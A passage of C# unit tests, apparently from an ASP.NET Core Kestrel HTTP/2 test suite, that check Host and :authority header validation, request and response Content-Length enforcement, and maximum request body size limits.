new KeyValuePair<string, string>(HeaderNames.Authority, ""),
new KeyValuePair<string, string>("Host", "abc"),
};
await InitializeConnectionAsync(_echoHost);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 65,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(4, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
Assert.Equal("abc", _decodedHeaders[HeaderNames.Host]);
}
[Fact]
public async Task HEADERS_Received_AuthorityOverridesHost_200Status()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "def"),
new KeyValuePair<string, string>("Host", "abc"),
};
await InitializeConnectionAsync(_echoHost);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 65,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(4, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
Assert.Equal("def", _decodedHeaders[HeaderNames.Host]);
}
[Fact]
public async Task HEADERS_Received_AuthorityOverridesInvalidHost_200Status()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "def"),
new KeyValuePair<string, string>("Host", "a=bc"),
};
await InitializeConnectionAsync(_echoHost);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 65,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(4, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
Assert.Equal("def", _decodedHeaders[HeaderNames.Host]);
}
[Fact]
public async Task HEADERS_Received_InvalidAuthority_Reset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "local=host:80"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR,
CoreStrings.FormatBadRequest_InvalidHostHeader_Detail("local=host:80"));
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task HEADERS_Received_InvalidAuthorityWithValidHost_Reset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "d=ef"),
new KeyValuePair<string, string>("Host", "abc"),
};
await InitializeConnectionAsync(_echoHost);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR,
CoreStrings.FormatBadRequest_InvalidHostHeader_Detail("d=ef"));
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task HEADERS_Received_TwoHosts_StreamReset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>("Host", "host1"),
new KeyValuePair<string, string>("Host", "host2"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR,
CoreStrings.FormatBadRequest_InvalidHostHeader_Detail("host1,host2"));
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task ContentLength_Received_SingleDataFrame_Verified()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
var buffer = new byte[100];
var read = await context.Request.Body.ReadAsync(buffer, 0, buffer.Length);
Assert.Equal(12, read);
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[12].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ContentLength_ReceivedInContinuation_SingleDataFrame_Verified()
{
await InitializeConnectionAsync(async context =>
{
var buffer = new byte[100];
var read = await context.Request.Body.ReadAsync(buffer, 0, buffer.Length);
Assert.Equal(12, read);
});
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>("a", _largeHeaderValue),
new KeyValuePair<string, string>("b", _largeHeaderValue),
new KeyValuePair<string, string>("c", _largeHeaderValue),
new KeyValuePair<string, string>("d", _largeHeaderValue),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[12].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ContentLength_Received_MultipleDataFrame_Verified()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
var buffer = new byte[100];
var read = await context.Request.Body.ReadAsync(buffer, 0, buffer.Length);
var total = read;
while (read > 0)
{
read = await context.Request.Body.ReadAsync(buffer, total, buffer.Length - total);
total += read;
}
Assert.Equal(12, total);
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[1].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[3].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[8].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ContentLength_Received_NoDataFrames_Reset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2StreamErrorLessDataThanLength);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task ContentLength_ReceivedInContinuation_NoDataFrames_Reset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>("a", _largeHeaderValue),
new KeyValuePair<string, string>("b", _largeHeaderValue),
new KeyValuePair<string, string>("c", _largeHeaderValue),
new KeyValuePair<string, string>("d", _largeHeaderValue),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2StreamErrorLessDataThanLength);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task ContentLength_Received_SingleDataFrameOverSize_Reset()
{
IOException thrownEx = null;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
thrownEx = await Assert.ThrowsAsync<IOException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[13].AsSpan(), endStream: true);
await WaitForStreamErrorAsync(1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2StreamErrorMoreDataThanLength);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
var expectedError = new Http2StreamErrorException(1, CoreStrings.Http2StreamErrorMoreDataThanLength, Http2ErrorCode.PROTOCOL_ERROR);
Assert.NotNull(thrownEx);
Assert.Equal(expectedError.Message, thrownEx.Message);
Assert.IsType<Http2StreamErrorException>(thrownEx.InnerException);
}
[Fact]
public async Task ContentLength_Received_SingleDataFrameUnderSize_Reset()
{
IOException thrownEx = null;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
thrownEx = await Assert.ThrowsAsync<IOException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[11].AsSpan(), endStream: true);
await WaitForStreamErrorAsync(1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2StreamErrorLessDataThanLength);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
var expectedError = new Http2StreamErrorException(1, CoreStrings.Http2StreamErrorLessDataThanLength, Http2ErrorCode.PROTOCOL_ERROR);
Assert.NotNull(thrownEx);
Assert.Equal(expectedError.Message, thrownEx.Message);
Assert.IsType<Http2StreamErrorException>(thrownEx.InnerException);
}
[Fact]
public async Task ContentLength_Received_MultipleDataFramesOverSize_Reset()
{
IOException thrownEx = null;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
thrownEx = await Assert.ThrowsAsync<IOException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[1].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[2].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[10].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[2].AsSpan(), endStream: true);
await WaitForStreamErrorAsync(1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2StreamErrorMoreDataThanLength);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
var expectedError = new Http2StreamErrorException(1, CoreStrings.Http2StreamErrorMoreDataThanLength, Http2ErrorCode.PROTOCOL_ERROR);
Assert.NotNull(thrownEx);
Assert.Equal(expectedError.Message, thrownEx.Message);
Assert.IsType<Http2StreamErrorException>(thrownEx.InnerException);
}
[Fact]
public async Task ContentLength_Received_MultipleDataFramesUnderSize_Reset()
{
IOException thrownEx = null;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
thrownEx = await Assert.ThrowsAsync<IOException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[1].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[2].AsSpan(), endStream: true);
await WaitForStreamErrorAsync(1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2StreamErrorLessDataThanLength);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
var expectedError = new Http2StreamErrorException(1, CoreStrings.Http2StreamErrorLessDataThanLength, Http2ErrorCode.PROTOCOL_ERROR);
Assert.NotNull(thrownEx);
Assert.Equal(expectedError.Message, thrownEx.Message);
Assert.IsType<Http2StreamErrorException>(thrownEx.InnerException);
}
[Fact]
public async Task ContentLength_Response_FirstWriteMoreBytesWritten_Throws_Sends500()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(async context =>
{
context.Response.ContentLength = 11;
await context.Response.WriteAsync("hello, world"); // 12
});
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
Assert.Contains(TestApplicationErrorLogger.Messages, m => m.Exception?.Message.Contains("Response Content-Length mismatch: too many bytes written (12 of 11).") ?? false);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("500", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ContentLength_Response_MoreBytesWritten_ThrowsAndResetsStream()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(async context =>
{
context.Response.ContentLength = 11;
await context.Response.WriteAsync("hello,");
await context.Response.WriteAsync(" world");
});
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 56,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 6,
withFlags: (byte)Http2DataFrameFlags.NONE,
withStreamId: 1);
await WaitForStreamErrorAsync(1, Http2ErrorCode.INTERNAL_ERROR, "Response Content-Length mismatch: too many bytes written (12 of 11).");
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("11", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ContentLength_Response_NoBytesWritten_Sends500()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(context =>
{
context.Response.ContentLength = 11;
return Task.CompletedTask;
});
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
Assert.Contains(TestApplicationErrorLogger.Messages, m => m.Exception?.Message.Contains("Response Content-Length mismatch: too few bytes written (0 of 11).") ?? false);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("500", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ContentLength_Response_TooFewBytesWritten_Resets()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(context =>
{
context.Response.ContentLength = 11;
return context.Response.WriteAsync("hello,");
});
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 56,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 6,
withFlags: (byte)Http2DataFrameFlags.NONE,
withStreamId: 1);
await WaitForStreamErrorAsync(1, Http2ErrorCode.INTERNAL_ERROR, "Response Content-Length mismatch: too few bytes written (6 of 11).");
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("11", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task MaxRequestBodySize_ContentLengthUnder_200()
{
_connectionContext.ServiceContext.ServerOptions.Limits.MaxRequestBodySize = 15;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
var buffer = new byte[100];
var read = await context.Request.Body.ReadAsync(buffer, 0, buffer.Length);
Assert.Equal(12, read);
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[12].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task MaxRequestBodySize_ContentLengthOver_413()
{
BadHttpRequestException exception = null;
_connectionContext.ServiceContext.ServerOptions.Limits.MaxRequestBodySize = 10;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
exception = await Assert.ThrowsAsync<BadHttpRequestException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
ExceptionDispatchInfo.Capture(exception).Throw();
});
await StartStreamAsync(1, headers, endStream: false);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 59,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("413", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
Assert.NotNull(exception);
}
[Fact]
public async Task MaxRequestBodySize_NoContentLength_Under_200()
{
_connectionContext.ServiceContext.ServerOptions.Limits.MaxRequestBodySize = 15;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(async context =>
{
var buffer = new byte[100];
var read = await context.Request.Body.ReadAsync(buffer, 0, buffer.Length);
Assert.Equal(12, read);
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[12].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task MaxRequestBodySize_NoContentLength_Over_413()
{
BadHttpRequestException exception = null;
_connectionContext.ServiceContext.ServerOptions.Limits.MaxRequestBodySize = 10;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(async context =>
{
exception = await Assert.ThrowsAsync<BadHttpRequestException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
ExceptionDispatchInfo.Capture(exception).Throw();
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[6].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[6].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[6].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 59,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("413", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
Assert.NotNull(exception);
}
[Theory]
[InlineData(true)]
[InlineData(false)]
public async Task MaxRequestBodySize_AppCanLowerLimit(bool includeContentLength)
{
BadHttpRequestException exception = null;
_connectionContext.ServiceContext.ServerOptions.Limits.MaxRequestBodySize = 20;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
if (includeContentLength)
{
headers.Concat(new[]
{
new KeyValuePair<string, string>(HeaderNames.ContentLength, "18"),
});
}
await InitializeConnectionAsync(async context =>
{
Assert.False(context.Features.Get<IHttpMaxRequestBodySizeFeature>().IsReadOnly);
context.Features.Get<IHttpMaxRequestBodySizeFeature>().MaxRequestBodySize = 17;
exception = await Assert.ThrowsAsync<BadHttpRequestException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
Assert.True(context.Features.Get<IHttpMaxRequestBodySizeFeature>().IsReadOnly);
ExceptionDispatchInfo.Capture(exception).Throw();
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[6].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[6].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[6].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 59,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("413", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
